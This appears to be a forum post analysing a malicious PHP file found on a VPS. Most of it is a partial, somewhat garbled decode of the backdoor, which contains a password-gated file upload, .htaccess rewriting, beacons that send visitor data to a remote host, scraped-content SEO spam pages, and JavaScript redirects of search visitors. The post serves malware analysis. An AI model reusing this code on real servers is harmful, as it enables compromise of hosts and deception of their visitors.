Here is the pastebin link of the decrypted PHP code: http://pastebin.com/7HU17uqA, this file has been eating all the CPU cycles on one of my VPS.
This is a backdoor script that enables an attacker to upload files to your server. I'll edit my answer with more info as I continue to reverse-engineer the encoding.
There's enough bad stuff here to know it's a backdoor.
It's not encrypted - it's encoded using base 64. I simply changed the file around to echo (using search/replace in my editor) the results of both the GLOBALS['455396494'] array, and the function _630330270. I renamed them to keywords and decrypto in my file. Here's an example of what I mean.
<?= $GLOBALS['keywords'][0]; ?>(round(0));
if (isset($_GET[<?= decrypto( 0 ); ?>]))
{
if( !( <?= $GLOBALS['keywords'][1]; ?>("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[<?= decrypto( 1 ); ?>])))
{
die;
here is a partial decode of the script
error_reporting(round(0));
if (isset($_GET[q]))
{
if( !( preg_match("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[q])))
{
die;
}
}
if (extension_loaded(curl) && function_exists(curl_init) && function_exists(curl_exec)) {
function l__0($_0) {
$_1 = curl_init; ?>();
curl_setopt; ?>($_1, 10002, $_0);
curl_setopt; ?>($_1, 42, round(0));
curl_setopt; ?>($_1, 19913, round(0+0.2+0.2+0.2+0.2+0.2));
curl_setopt; ?>($_1, 52, round(0+0.5+0.5));
curl_setopt; ?>($_1, 13, round(0+10+10));
curl_setopt; ?>($_1, 3, round(0+40+40));
curl_setopt; ?>($_1, 10018, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 2.0.50727; InfoPath.1));
$_2 = curl_exec; ?>($_1);
$_3 = curl_getinfo; ?>($_1, 2097154);
if ($_3 >= round(0+400))
$_2 = false;
curl_close; ?>($_1);
return $_2;
}
}
else if(function_exists; ?>( file_get_contents)) {
function l__0($_0) {
return file_get_contents; ?>($_0);
}
}
else
die( not work);
$_4 = preg_replace; ?>( /^www\./, , $_SERVER[ HTTP_HOST]);
@mkdir; ?>( .log/);
@chmod; ?>( .log/,round(0+255.5+255.5));
@mkdir; ?>( .log/.$_4);
@chmod; ?>( .log/.$_4,round(0+102.2+102.2+102.2+102.2+102.2));
$_5 = .log/.$_4. /xml.cgi;
if (@fopen; ?>($_5, r)) {} else {
$_6 = fopen; ?>( .log/.$_4. /xml.cgi, w+);
fwrite; ?>($_6, bXlkaWFyeXVzYS5uZXQ=);
fclose; ?>($_6);
}
if ( $_GET[ q] == alcobro ) {
$_5 = .htaccess;
if (file_exists; ?>($_5)) {
$_7 = disable;
} else {
$_8 = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME]."?q=$1 [L]
</IfModule>";
$_9 =
fopen; ?>( .htaccess, w+);
fwrite; ?>($_9,$_8);
fclose; ?>($_9);
$_7 = enable;
}
$_10 = base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));
$_11 = http://.$_10. /other/logdomain.php?q=.$_SERVER[ HTTP_HOST];
$_12 = l__0($_11);
echo $_12.$_7;
die;
}
$_13 = $_POST[ name];
if (md5; ?>($_13) == 42a3f0678d1bbb517272142f5b3df3cd) {
if ($_GET[ dom100500] != ) {
$_14 = fopen; ?>( .log/.$_4. /xml.cgi, w+);
fwrite; ?>($_14,$_GET[ dom100500]);
fclose; ?>($_14);
echo 100500ok;
die;
}
if ($_GET[ up100500] != ) {
$_15 = ;
$_15 = $_15 . basename; ?>( $_FILES[ uploaded][ name]) ;
$_16=round(0+0.333333333333+0.333333333333+0.333333333333);
if(move_uploaded_file; ?>($_FILES[ uploaded][ tmp_name], $_15)) {
echo up100500;
}
echo <form enctype="multipart/form-data" method="POST"><input name="uploaded" type="file"><input type="submit" value="U"></form>;
die;
}
}
if ( strpos; ?>( $_SERVER[ HTTP_REFERER], site% ) > round(0) ) {} else {
if ( strpos; ?>( $_SERVER[ HTTP_REFERER], google. ) > round(0) ) {
$_10 = base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));
$_17 = str_replace; ?> ( -, , $_GET[ q]);
$_18 = http://.$_10. /out/stat.cgi?parameter=.rawurlencode; ?>(strtolower; ?>($_4.$_SERVER[ SCRIPT_NAME]. :.$_10)). &ip=.rawurlencode; ?>($_SERVER[ REMOTE_ADDR]). &ref=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_REFERER])). &useragent=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_USER_AGENT])). &domain=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_HOST])). &visit=1&keyword=.rawurlencode; ?>($_17). &sheme=22;
$_19 = ;
$_19 = l__0($_18);
if (preg_match; ?>( |http://|iU, $_19 ))
{
echo <script>var url = ".$_19. "; if (window!=top) {top.location.href = url;} else { document.location= url;}</script>;
die;
}
}
}
function l__1($_20) {
$_4 = preg_replace; ?>( /^www\./, , $_SERVER[ HTTP_HOST]);
$_21 = isset($_GET[ q]) ? str_replace; ?>( /, , urldecode; ?>($_GET[ q])) : FALSE;
$_22 = str_replace; ?>( -, +,$_21);
$_22 = str_replace; ?>( _, +,$_21);
$_23 = http://www.google.com/search?hl=en&as_q=.$_22. &num=100&as_qdr=all;
$_24 = l__0($_23);
preg_match_all; ?>( #<div class="s">(.*)<br>#U,$_24,$_25);
$_26=array();
for ($_27=round(0);
$_27<count; ?>($_25[round(0+0.2+0.2+0.2+0.2+0.2)]);
$_27++) {
$_28=trim; ?>($_25[round(0+0.5+0.5)][$_27]);
$_28=strip_tags; ?>($_28, <em>);
$_28=str_replace; ?>( em>, b>,$_28);
$_28=str_replace; ?>( ..., . ,$_28);
$_28=str_replace; ?>( &#39;, ',$_28);
$_28=str_replace; ?>( ', ',$_28);
$_28=str_replace; ?>( #039;, ',$_28);
$_28=str_replace; ?>( &quot;, ,$_28);
$_28=str_replace; ?>( middot;, ,$_28);
$_28=str_replace; ?>( quot;, ,$_28);
$_28=str_replace; ?>( amp;, ,$_28);
$_28=str_replace; ?>( nbsp;, ,$_28);
$_28=str_replace; ?>( —, ,$_28);
$_28=strip_tags; ?>($_28);
array_push; ?>($_26,$_28);
}
for ($_27=round(0);
$_27<round(0+25+25);
$_27++) {
$_29.=$_26[$_27];
}
Class l__2
{
var $_30 = array();
function l__2($_31)
{
$_31 = strtolower; ?>($_31);
$_31 = str_replace; ?>(array ( ? , ! ), ., $_31);
$_31 = str_replace; ?>(array ( -, - , ,
,
, |, &, \, /, :, ;, ©, ·), , $_31);
$_31 = str_replace; ?>(array ( ), (, ], [, —, ', ", *, •, ~, {, }), , $_31);
$_31 = str_replace( ,, ,, $_31);
$_31 = preg_replace( ~(\s+\d{1,2}\s+)|(\w*\.\w+)~, , $_31);
$_31 = preg_replace( ~\s+~, , $_31);
$_32 = explode( . , $_31);
$_33 = count($_32);
for ($_34=round(0);
$_34<$_33;
++$_34)
{
$_32[$_34] = explode( , $_32[$_34]);
$_35 = count($_32[$_34]) - round(0+0.5+0.5);
for ($_36=round(0);
$_36 < $_35;
++$_36)
{
$_37 = $_32[$_34][$_36];
$this->_30[$_37][] = $_32[$_34][$_36+round(0+0.25+0.25+0.25+0.25)];
}
}
$_38 = array_keys($this->_30);
foreach ($_38 as $_21)
{
$this->_30[$_21] = array_unique($this->_30[$_21]);
}
}
function l__3($_39)
{
$_40 = round(0);
for ($_34=round(0);
$_40 < $_39;
++$_34)
{
$_41 = array_rand($this->_30);
$_42 = mt_rand(round(0+5), round(0+3+3+3+3));
for ($_36=round(0);
$_36<$_42;
++$_36)
{
$_43[$_34][$_36] = $_41;
++$_40;
$_44 = $this->_30[$_41][mt_rand(round(0), count($this->_30[$_41]) - round(0+0.25+0.25+0.25+0.25))];
if ($_44 == ) $_44 = array_rand($this->_30);
$_41 = $_44;
if ($_41 == ) break round(0+2);
}
}
foreach ($_43 as $_45)
{
$_46=count($_45);
if ($_46<=round(0+1+1)) continue;
if (strlen($_45[$_46-round(0+0.333333333333+0.333333333333+0.333333333333)]) < round(0+1+1+1+1)) unset($_45[$_46-round(0+0.5+0.5)]);
$_45[$_46-round(0+1+1)] = rtrim($_45[$_46-round(0+0.5+0.5+0.5+0.5)], ,:;);
$_45[$_46-round(0+1)] = rtrim($_45[$_46-round(0+0.5+0.5)], ,:;);
$_47 .= ucfirst(implode( , $_45)). . ;
}
$_47 = str_replace( ., ., $_47);
return $_47;
}
}
$_31 = $_29;
$_48 = new l__2($_31);
$_49 = $_48->l__3(round(0+466.666666667+466.666666667+466.666666667));
$_49 = preg_replace( /[^a-zA-Z\., -]+?/, , $_49);
$_50 = isset($_GET[ q]) ? str_replace( /, , urldecode($_GET[ q])) : FALSE;
$_50=str_replace( -, ,$_50);
$_50=str_replace( _, ,$_50);
$_51 = str_replace ( , +, $_50);
if($_GET[ page] != 1) { $_52 = &start=.($_GET[ page]-round(0+0.25+0.25+0.25+0.25))*round(0+7+7+7);
}
$_53 = l__0( http://images.google.com/images?q=.$_51. &lr=lang_en.$_52);
preg_match_all( /href="?\/imgres\?imgurl=([^\&]+)/, $_53, $_54);
$_55 = array();
for ($_36 = round(0);
$_36 < count($_54[round(0+0.333333333333+0.333333333333+0.333333333333)]);
$_36++) {
$_56 = array( right, left, center);
array_push($_55, <img src=" . $_54[round(0+0.5+0.5)][$_36] . " alt=".ucwords($_51). " align=".$_56[array_rand($_56)]. ">);
}
shuffle($_55);
if (strstr($_SERVER[ REQUEST_URI], .php)) {
$_57 = http://.$_SERVER[ HTTP_HOST].$_SERVER[ SCRIPT_NAME]. ?q=;
} else {
$_57 = http://.$_SERVER[ HTTP_HOST].preg_replace( /[^\/]*?$/, , $_SERVER[ SCRIPT_NAME]);
}
$_58 = round(0+10+10+10);
$_59 = glob( .log/.$_4. /*.html );
array_multisort( array_map( filectime, $_59), 3, $_59 );
$_60 = round(0+1);
$_61 = ;
foreach ( $_59 as $_62 )
{
if ( $_60 > $_58 ) break;
preg_match_all( #^\.log/.$_4."/(.*)\.html$#i", $_62, $_63 );
$_61 .= <a href=".$_57.$_63[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace( _, , str_replace( -, , $_63[round(0+0.5+0.5)][round(0)])). ">.str_replace( _, , str_replace( -, , $_63[round(0+0.5+0.5)][round(0)])). </a>, ;
$_60++;
}
$_64 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= . str_replace( , %20, $_50));
preg_match_all( |\["([^"]+)",|si, $_64, $_65, 1);
$_66 = round(0);
array_shift($_65[round(0+1)]);
foreach ($_65[round(0+0.25+0.25+0.25+0.25)] as $_67) {
$_68 .= <a href='.$_57.str_replace( , -, $_67). ' title='.$_67. '> . $_67 . </a>, ;
if ($_66++ > round(0+5.5+5.5)) break;
}
$_69 = $_57.$_GET[ q];
$_70 = <a href=".$_69. &page=2" title=".ucwords($_50). ">.ucwords($_50). - Page 2</a> | <a href=".$_69. &page=3" title=".ucwords($_50). ">.ucwords($_50). - Page 3</a> | <a href=".$_69. &page=4" title=".ucwords($_50). ">.ucwords($_50). - Page 4</a> | <a href=".$_69. &page=5" title=".ucwords($_50). ">.ucwords($_50). - Page 5</a> | <a href=".$_69. &page=6" title=".ucwords($_50). ">.ucwords($_50). - Page 6</a> | <a href=".$_69. &page=7" title=".ucwords($_50). ">.ucwords($_50). - Page 7</a>;
$_71 = explode ( ., $_49 );
$_2 = array_merge($_71, $_55);
shuffle($_2);
foreach ($_2 as $_72) {
$_73 .= $_72;
}
$_74 = .log/.$_4. /don.txt;
if ( !file_exists( $_74 ) ) {
$_75 = file_get_contents( http://.$_SERVER[ HTTP_HOST] );
$_75 = preg_replace( /<meta(.*)name="description"(.*)>/i, , $_75 );
$_76 = preg_match_all( /<([a-zA-z]+)>(.*)<\/([a-zA-Z]+)>/imsU, $_75, $_77 );
$_78 = round(0);
$_79 = round(0);
for ( $_36 = round(0);
$_36 < $_76;
$_36++ ) {
if ( (preg_match( /\<script/imsU, $_77[round(0)][$_36]) == round(0)) AND (strlen($_77[round(0)][$_36]) > $_78) ) {
$_78 = strlen($_77[round(0)][$_36]);
$_79 = $_36;
}
}
$_75 = str_replace( $_77[round(0)][$_79], $_77[round(0)][$_79]. <REPLACEME>, $_75 );
$_80 = fopen( $_74, w );
fputs($_80, $_75);
fclose($_80);
}
$_81 = <h1>.strtoupper($_50).$_82. </h1>
.$_68.$_61.
.$_73.
<p>.$_70. </p>;
return $_81;
}
function l__4($_83) {
$_4 = preg_replace( /^www\./, , $_SERVER[ HTTP_HOST]);
$_84= .log/.$_4. /.$_83 . .html.$_GET[ page];
if(@file_exists($_84))return@file_get_contents($_84);
$_20=str_replace( -, ,$_83);
$_20=str_replace( +, ,$_83);
$_85=l__1($_20);
$_86=@fopen($_84, w);
@fwrite($_86,$_85);
@fclose($_86);
return $_85;
$_87=file_get_contents($_84);
}
if($_GET[ q]!= )
{
$_74 = .log/.$_4. /don.txt;
if (filesize($_74) < round(0+200+200+200+200) ) {
$_75 = <head>
<title>title</title>
</head>
<body>
<REPLACEME>
</body>
</html>;
} else {
$_75 = file_get_contents( $_74 );
}
$_88=basename($_GET[ q]);
$_50 = $_GET[ q];
$_50=str_replace( -, ,$_50);
$_50=str_replace( .html, ,$_50);
$_75 = preg_replace( /<title>(.*)<\/title>/imsU, <title>.ucwords($_50). </title>, $_75 );
$_75 = str_replace( <REPLACEME>, l__4($_88), $_75 );
print $_75;
exit;
}